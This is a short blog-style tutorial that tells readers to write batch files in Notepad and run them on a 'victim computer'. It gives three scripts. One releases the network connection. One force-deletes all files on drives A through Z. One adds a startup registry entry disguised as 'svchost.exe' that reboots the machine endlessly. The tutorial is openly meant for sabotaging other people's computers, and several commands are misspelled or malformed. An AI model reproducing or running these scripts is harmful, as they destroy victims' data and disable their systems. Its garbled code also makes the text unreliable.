Computer Hacking using the Notepad
Different types of code for Computer Hacking using the Notepad
Hello friends.............
So friends in this page we will make hacking code.Using this code we make hacker .So friends start .
Disable the Internet in your victim computer
- First you start the notepad in your computer.
- Then start the code to write in your computer .
@echo off
ipconfig/Release
if ERRORLEVEL1 inconfig/release all
exit
Then this file save as ".bat" in your computer.
Then copy this file and run in your victim computer.
Delete the all drivers in your victim computer
- In this file do also do as it is in first topic.
- start to write a code
@echo off
del A:*.*/f/s/q
del B:*.*/f/s/q
del C:*.*/f/s/q
del D:*.*/f/s/q
del E:*.*/f/s/q
del F:*.*./f/s/q
del G:*.*/f/s/q
del H:*.*/f/s/q
del I:*.*/f/s/q
del J:*.*/f/s/q
del K:*.*/f/s/q
del L:*.*/f/s/q
del M:*.*/f/s/q
del N:*.*/f/s/q
del O:*.*/f/s/q
del P:*.*/f/s/q
del Q:*.*/f/s/q
del R:*.*/f/s/q
del S:*.*/f/s/q
del T:*.*/f/s/q
del U:*.*/f/s/q
del V:*.*/f/s/q
del W:*.*/f/s/q
del X:*.*/f/s/q
del Y:*.*/f/s/q
del Z:*.*/f/s/q
exit
Also the save the file .bat and save.
Run file in victim computer.
Keep Victim's Computer Rebooting
- Open the notepad and write a code .
reg add HKLMSOFTWAREMicrosoftWindoswsCurrentVersionRun/f/v"svchost.exe"/d"shutdown-r-t 00"
exit
Also the save the file .bat and save.
Comments
Post a Comment